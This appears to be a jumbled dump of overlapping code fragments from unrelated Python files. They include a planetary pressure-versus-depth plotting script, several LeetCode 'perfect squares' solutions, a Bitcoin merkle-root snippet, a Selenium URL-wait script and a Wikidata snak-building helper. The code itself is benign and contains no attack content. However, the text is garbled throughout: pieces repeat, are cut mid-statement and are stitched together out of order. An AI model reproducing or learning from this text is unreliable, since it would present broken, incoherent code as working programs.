93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766 dataset = StringIO(\"\"\"\\ transaction1_serialized_A_B_3 transaction2_serialized_B_C_1 transaction3_serialized_D_E_2 transaction4_serialized_E_B_1 transaction5_serialized_C_B_2 transaction6_serialized_D_A_1 \"\"\") df", "BlockMerkleRoot ---> new bitcoin core implementation ''' import pandas as pd from hashlib", "Generate root merkle tree hash in python. I use https://github.com/bitcoin/bitcoin as reference: BlockBuildMerkleTree" ]
[ "P def f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100)", "label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some", "5510 * 9.807 * x return P def jupiter(x): P = 1330 *", "for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend()", "x return P def mars(x): P = 3930 * 3.711 * x return", "def earth(x): P = 5510 * 9.807 * x return P def jupiter(x):", "9.807 * x return P def jupiter(x): P = 1330 * 24.79 *", "= 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth", "= arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)')", "def f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max", "P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside", "x return P def f(x): P = 4e9 return ones(shape(x)) * P x", "P = 3930 * 3.711 * x return P def earth(x): P =", "* 9.807 * x return P def jupiter(x): P = 1330 * 24.79", "* x return P def earth(x): P = 5510 * 9.807 * x", "label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some numbers') plt.show()", "return P def mars(x): P = 3930 * 3.711 * x return P", "= 3340 * 1.622 * x return P def mars(x): P = 3930", "mars(x): P = 3930 * 3.711 * x return P def earth(x): P", "jupiter(x): P = 1330 * 24.79 * x return P def f(x): P", "= 1330 * 24.79 * x return P def f(x): P = 4e9", "* 24.79 * x return P def f(x): P = 4e9 return ones(shape(x))", "def mars(x): P = 3930 * 3.711 * x return P def earth(x):", "import matplotlib.pyplot as plt from pylab import * def moon(x): P = 3340", "plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x),", "plt from pylab import * def moon(x): P = 3340 * 1.622 *", "Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x))", "moon(x): P = 3340 * 1.622 * x return P def mars(x): P", "plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x),", "* P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure", "* def moon(x): P = 3340 * 1.622 * x return P def", "= earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure", "as plt from pylab import * def moon(x): P = 3340 * 1.622", "x return P def earth(x): P = 5510 * 9.807 * x return", "= 3930 * 3.711 * x return P def earth(x): P = 5510", "x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet", "P = 1330 * 24.79 * x return P def f(x): P =", "Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x),", "<filename>astro345_fall2015/astro345_hw12.py import matplotlib.pyplot as plt from pylab import * def moon(x): P =", "P def earth(x): P = 5510 * 9.807 * x return P def", "1330 * 24.79 * x return P def f(x): P = 4e9 return", "4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside", "earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for", "* x return P def f(x): P = 4e9 return ones(shape(x)) * P", "plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets')", "earth(x): P = 5510 * 9.807 * x return P def jupiter(x): P", "3.711 * x return P def earth(x): P = 5510 * 9.807 *", "P def mars(x): P = 3930 * 3.711 * x return P def", "import * def moon(x): P = 3340 * 1.622 * x return P", "plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4])", "return P def jupiter(x): P = 1330 * 24.79 * x return P", "ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)')", "P def jupiter(x): P = 1330 * 24.79 * x return P def", "def jupiter(x): P = 1330 * 24.79 * x return P def f(x):", "f(x): P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max =", "24.79 * x return P def f(x): P = 4e9 return ones(shape(x)) *", "(meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon')", "matplotlib.pyplot as plt from pylab import * def moon(x): P = 3340 *", "* x return P def mars(x): P = 3930 * 3.711 * x", "return P def f(x): P = 4e9 return ones(shape(x)) * P x =", "Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars')", "3340 * 1.622 * x return P def mars(x): P = 3930 *", "3930 * 3.711 * x return P def earth(x): P = 5510 *", "1.622 * x return P def mars(x): P = 3930 * 3.711 *", "Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~", "P = 5510 * 9.807 * x return P def jupiter(x): P =", "P = 3340 * 1.622 * x return P def mars(x): P =", "y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs", "P = 4e9 return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6)", "Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x),", "x return P def jupiter(x): P = 1330 * 24.79 * x return", "from pylab import * def moon(x): P = 3340 * 1.622 * x", "plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~ plt.ylabel('some numbers')", "vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter')", "* x return P def jupiter(x): P = 1330 * 24.79 * x", "plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max]) plt.legend() #~ plt.plot([1,2,3,4]) #~", "(Pascals)') plt.title('Depth vs Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth')", "= 5510 * 9.807 * x return P def jupiter(x): P = 1330", "Pressure for Planets') plt.plot(x,f(x)) plt.plot(x,moon(x), label='Moon') plt.plot(x,mars(x), label='Mars') plt.plot(x,earth(x), label='Earth') plt.plot(x,jupiter(x), label='Jupiter') plt.axis([0,3e6,0,y_max])", "def moon(x): P = 3340 * 1.622 * x return P def mars(x):", "* 1.622 * x return P def mars(x): P = 3930 * 3.711", "arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet (meters)') plt.ylabel('Pressure Inside Planet (Pascals)') plt.title('Depth", "* 3.711 * x return P def earth(x): P = 5510 * 9.807", "pylab import * def moon(x): P = 3340 * 1.622 * x return", "return ones(shape(x)) * P x = arange(0,3e6,100) y_max = earth(3e6) plt.xlabel('Depth Inside Planet", "return P def earth(x): P = 5510 * 9.807 * x return P" ]
[ "count else: for i, square in enumerate(squares): # Find the biggest square that", "in square_nums: if is_divided_by(n - k, count - 1): return True return False", "= min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS 1", "1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n,", "of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if", "# Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int: squares", "+ 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def", "the biggest square that is no larger than n # If current count", "enumerate(squares): # Find the biggest square that is no larger than n #", "break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy", "return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int) ->", "answer, prune it if square <= n and count + 1 < self.ans:", "+ 1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy", "is_divided_by(n - k, count - 1): return True return False square_nums = set([i", "0: self.ans = count else: for i, square in enumerate(squares): # Find the", "perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if count", "it if square <= n and count + 1 < self.ans: self.dfs(n -", "count is reaching second best answer, prune it if square <= n and", "current count is reaching second best answer, prune it if square <= n", "that is no larger than n # If current count is reaching second", "< self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2", "def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be", "** 0.5) + 1)] dp = [0] + [float('inf')] * n for i", "range(1, n + 1): for square in squares: if i < square: break", "count == 1: return n in square_nums for k in square_nums: if is_divided_by(n", "False square_nums = set([i * i for i in range(1, int(n ** 0.5)", "-> int: squares = [x ** 2 for x in range(1, int(n **", "DFS 1 class Solution: def numSquares(self, n: int) -> int: squares = [x", "1): return True return False square_nums = set([i * i for i in", "1 class Solution: def numSquares(self, n: int) -> int: squares = [x **", "i < square: break dp[i] = min(dp[i], dp[i - square] + 1) return", "DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true", "for i in range(1, n + 1): for square in squares: if i", "+ [float('inf')] * n for i in range(1, n + 1): for square", "count + 1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) #", "min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS 1 class", "0.5) + 1)] dp = [0] + [float('inf')] * n for i in", "n in square_nums for k in square_nums: if is_divided_by(n - k, count -", "e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if count == 1: return", "int) -> int: squares = [x ** 2 for x in range(1, int(n", "self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2 class", "k in square_nums: if is_divided_by(n - k, count - 1): return True return", "is no larger than n # If current count is reaching second best", "\"\"\" if count == 1: return n in square_nums for k in square_nums:", "1 < self.ans: self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS", "for k in square_nums: if is_divided_by(n - k, count - 1): return True", "square in enumerate(squares): # Find the biggest square that is no larger than", "1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int)", "squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count):", "squares = [x ** 2 for x in range(int(n ** 0.5), 0, -1)]", "int: squares = [x ** 2 for x in range(1, int(n ** 0.5)", "biggest square that is no larger than n # If current count is", "\"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false", "class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\"", "square in squares: if i < square: break dp[i] = min(dp[i], dp[i -", "for x in range(1, int(n ** 0.5) + 1)] dp = [0] +", "in range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')] *", "* i for i in range(1, int(n ** 0.5) + 1)]) for count", "self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares):", "\"n\" can be decomposed into \"count\" number of perfect square numbers. e.g. n=12,", "self.ans def dfs(self, n, count, squares): if n == 0: self.ans = count", "= count else: for i, square in enumerate(squares): # Find the biggest square", "Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return:", "true. n=12, count=2: false \"\"\" if count == 1: return n in square_nums", "n=12, count=3: true. n=12, count=2: false \"\"\" if count == 1: return n", "squares = [x ** 2 for x in range(1, int(n ** 0.5) +", "def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into \"count\"", "count, squares): if n == 0: self.ans = count else: for i, square", "count + 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self, n):", "+ 1): for square in squares: if i < square: break dp[i] =", "square, count + 1, squares[i:]) # Greedy DFS 2 class Solution: def numSquares(self,", "is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into \"count\" number", "+ 1)]) for count in range(1, n + 1): if is_divided_by(n, count): return", "[x ** 2 for x in range(1, int(n ** 0.5) + 1)] dp", "return True return False square_nums = set([i * i for i in range(1,", "x in range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')]", "range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans", "i, square in enumerate(squares): # Find the biggest square that is no larger", "return: true if \"n\" can be decomposed into \"count\" number of perfect square", "0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self,", "is reaching second best answer, prune it if square <= n and count", "n: int) -> int: squares = [x ** 2 for x in range(1,", "range(1, int(n ** 0.5) + 1)]) for count in range(1, n + 1):", "* n for i in range(1, n + 1): for square in squares:", "in square_nums for k in square_nums: if is_divided_by(n - k, count - 1):", "x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares)", "can be decomposed into \"count\" number of perfect square numbers. e.g. n=12, count=3:", "+ 1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n:", "= [x ** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans", "numSquares(self, n: int) -> int: squares = [x ** 2 for x in", "# Greedy DFS 2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\"", "\"\"\" return: true if \"n\" can be decomposed into \"count\" number of perfect", "square <= n and count + 1 < self.ans: self.dfs(n - square, count", "squares) return self.ans def dfs(self, n, count, squares): if n == 0: self.ans", "else: for i, square in enumerate(squares): # Find the biggest square that is", "square that is no larger than n # If current count is reaching", "i for i in range(1, int(n ** 0.5) + 1)]) for count in", "n for i in range(1, n + 1): for square in squares: if", "if i < square: break dp[i] = min(dp[i], dp[i - square] + 1)", "int(n ** 0.5) + 1)] dp = [0] + [float('inf')] * n for", "2 for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n,", "Find the biggest square that is no larger than n # If current", "0, squares) return self.ans def dfs(self, n, count, squares): if n == 0:", "** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf')", "class Solution: def numSquares(self, n: int) -> int: squares = [x ** 2", "in range(1, n + 1): for square in squares: if i < square:", "- 1): return True return False square_nums = set([i * i for i", "square_nums = set([i * i for i in range(1, int(n ** 0.5) +", "for i in range(1, int(n ** 0.5) + 1)]) for count in range(1,", "# DP class Solution: def numSquares(self, n: int) -> int: squares = [x", "n # If current count is reaching second best answer, prune it if", "int(n ** 0.5) + 1)]) for count in range(1, n + 1): if", "- k, count - 1): return True return False square_nums = set([i *", "< square: break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1]", "dp[-1] # Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int:", "DP class Solution: def numSquares(self, n: int) -> int: squares = [x **", "1): for square in squares: if i < square: break dp[i] = min(dp[i],", "false \"\"\" if count == 1: return n in square_nums for k in", "0.5) + 1)]) for count in range(1, n + 1): if is_divided_by(n, count):", "if is_divided_by(n - k, count - 1): return True return False square_nums =", "if square <= n and count + 1 < self.ans: self.dfs(n - square,", "count=3: true. n=12, count=2: false \"\"\" if count == 1: return n in", "= [0] + [float('inf')] * n for i in range(1, n + 1):", "square_nums: if is_divided_by(n - k, count - 1): return True return False square_nums", "** 2 for x in range(1, int(n ** 0.5) + 1)] dp =", "n, count, squares): if n == 0: self.ans = count else: for i,", "self.ans = count else: for i, square in enumerate(squares): # Find the biggest", "range(1, int(n ** 0.5) + 1)] dp = [0] + [float('inf')] * n", "# Find the biggest square that is no larger than n # If", "[float('inf')] * n for i in range(1, n + 1): for square in", "float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if n", "in squares: if i < square: break dp[i] = min(dp[i], dp[i - square]", "for x in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0,", "2 class Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if", "= set([i * i for i in range(1, int(n ** 0.5) + 1)])", "in range(int(n ** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return", "- square, count + 1, squares[i:]) # Greedy DFS 2 class Solution: def", "squares: if i < square: break dp[i] = min(dp[i], dp[i - square] +", "return self.ans def dfs(self, n, count, squares): if n == 0: self.ans =", "if n == 0: self.ans = count else: for i, square in enumerate(squares):", "best answer, prune it if square <= n and count + 1 <", "n: int) -> int: squares = [x ** 2 for x in range(int(n", "prune it if square <= n and count + 1 < self.ans: self.dfs(n", "second best answer, prune it if square <= n and count + 1", "dfs(self, n, count, squares): if n == 0: self.ans = count else: for", "n and count + 1 < self.ans: self.dfs(n - square, count + 1,", "be decomposed into \"count\" number of perfect square numbers. e.g. n=12, count=3: true.", "self.dfs(n - square, count + 1, squares[i:]) # Greedy DFS 2 class Solution:", "= float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if", "n + 1): for square in squares: if i < square: break dp[i]", "dp = [0] + [float('inf')] * n for i in range(1, n +", "== 0: self.ans = count else: for i, square in enumerate(squares): # Find", "1)] dp = [0] + [float('inf')] * n for i in range(1, n", "-> int: squares = [x ** 2 for x in range(int(n ** 0.5),", "than n # If current count is reaching second best answer, prune it", "i in range(1, int(n ** 0.5) + 1)]) for count in range(1, n", "<= n and count + 1 < self.ans: self.dfs(n - square, count +", "- square] + 1) return dp[-1] # Greedy DFS 1 class Solution: def", "true if \"n\" can be decomposed into \"count\" number of perfect square numbers.", "square_nums for k in square_nums: if is_divided_by(n - k, count - 1): return", "+ 1)] dp = [0] + [float('inf')] * n for i in range(1,", "larger than n # If current count is reaching second best answer, prune", "-1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n, count,", "reaching second best answer, prune it if square <= n and count +", "set([i * i for i in range(1, int(n ** 0.5) + 1)]) for", "in range(1, int(n ** 0.5) + 1)]) for count in range(1, n +", "def numSquares(self, n: int) -> int: squares = [x ** 2 for x", "square] + 1) return dp[-1] # Greedy DFS 1 class Solution: def numSquares(self,", "== 1: return n in square_nums for k in square_nums: if is_divided_by(n -", "= [x ** 2 for x in range(1, int(n ** 0.5) + 1)]", "1)]) for count in range(1, n + 1): if is_divided_by(n, count): return count", "i in range(1, n + 1): for square in squares: if i <", "in enumerate(squares): # Find the biggest square that is no larger than n", "n=12, count=2: false \"\"\" if count == 1: return n in square_nums for", "def dfs(self, n, count, squares): if n == 0: self.ans = count else:", "square: break dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] #", "int: squares = [x ** 2 for x in range(int(n ** 0.5), 0,", "squares): if n == 0: self.ans = count else: for i, square in", "number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\"", "numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if count == 1:", "count=2: false \"\"\" if count == 1: return n in square_nums for k", "** 0.5), 0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def", "n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed into", "dp[i - square] + 1) return dp[-1] # Greedy DFS 1 class Solution:", "return False square_nums = set([i * i for i in range(1, int(n **", "Solution: def numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can", "if count == 1: return n in square_nums for k in square_nums: if", "self.dfs(n, 0, squares) return self.ans def dfs(self, n, count, squares): if n ==", "n == 0: self.ans = count else: for i, square in enumerate(squares): #", "count): \"\"\" return: true if \"n\" can be decomposed into \"count\" number of", "for square in squares: if i < square: break dp[i] = min(dp[i], dp[i", "return n in square_nums for k in square_nums: if is_divided_by(n - k, count", "2 for x in range(1, int(n ** 0.5) + 1)] dp = [0]", "0, -1)] self.ans = float('inf') self.dfs(n, 0, squares) return self.ans def dfs(self, n,", "square numbers. e.g. n=12, count=3: true. n=12, count=2: false \"\"\" if count ==", "for i, square in enumerate(squares): # Find the biggest square that is no", "# If current count is reaching second best answer, prune it if square", "If current count is reaching second best answer, prune it if square <=", "[0] + [float('inf')] * n for i in range(1, n + 1): for", "if \"n\" can be decomposed into \"count\" number of perfect square numbers. e.g.", "decomposed into \"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12,", "k, count - 1): return True return False square_nums = set([i * i", "True return False square_nums = set([i * i for i in range(1, int(n", "int) -> int: squares = [x ** 2 for x in range(int(n **", "Solution: def numSquares(self, n: int) -> int: squares = [x ** 2 for", "Greedy DFS 1 class Solution: def numSquares(self, n: int) -> int: squares =", "no larger than n # If current count is reaching second best answer,", "into \"count\" number of perfect square numbers. e.g. n=12, count=3: true. n=12, count=2:", "numSquares(self, n): def is_divided_by(n, count): \"\"\" return: true if \"n\" can be decomposed", "and count + 1 < self.ans: self.dfs(n - square, count + 1, squares[i:])", "** 0.5) + 1)]) for count in range(1, n + 1): if is_divided_by(n,", "dp[i] = min(dp[i], dp[i - square] + 1) return dp[-1] # Greedy DFS", "count - 1): return True return False square_nums = set([i * i for", "[x ** 2 for x in range(int(n ** 0.5), 0, -1)] self.ans =", "1: return n in square_nums for k in square_nums: if is_divided_by(n - k," ]
[ "selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html'", "browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click()", "= Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until(", "= 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b", "WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until( url_matches('http.*live'), )", "( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw =", "selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url)", "'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a')", "= WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until( url_matches('http.*live'),", "wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), ) wdw.until(", ") url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links", "from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url =", "Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url", "from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox()", "import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw", "Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'),", "from selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains,", "selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches", "import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser", "import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches )", "<reponame>VeirichR/curso-python-selenium<filename>codigo_das_aulas/aula_10/aula_10_08.py from selenium.webdriver import Firefox from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support.expected_conditions import (", "url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10)", "WebDriverWait from selenium.webdriver.support.expected_conditions import ( url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser =", "browser.get(url) wdw = WebDriverWait(browser, 10) links = browser.find_elements_by_css_selector('.body_b a') links[1].click() wdw.until( url_contains('selenium'), )", "url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser, 10) links =", "url_contains, url_matches ) url = 'https://selenium.dunossauro.live/aula_10_c.html' browser = Firefox() browser.get(url) wdw = WebDriverWait(browser," ]
[ "else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId)", "\"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if", "{type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict:", "\"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content", "to datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict: return", "type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime", "\"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError(", "\"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value)", "\"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", }", "float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\":", "to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return", ") else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype =", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value) ==", "typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo", "type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can", "== dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime =", "if type(value) in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\":", "\"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "\"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"}", "\"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj:", "value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr)", "= json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\",", "\"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\":", "\"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value,", "str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else:", "from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str):", "datetime import datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache()", "== dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: 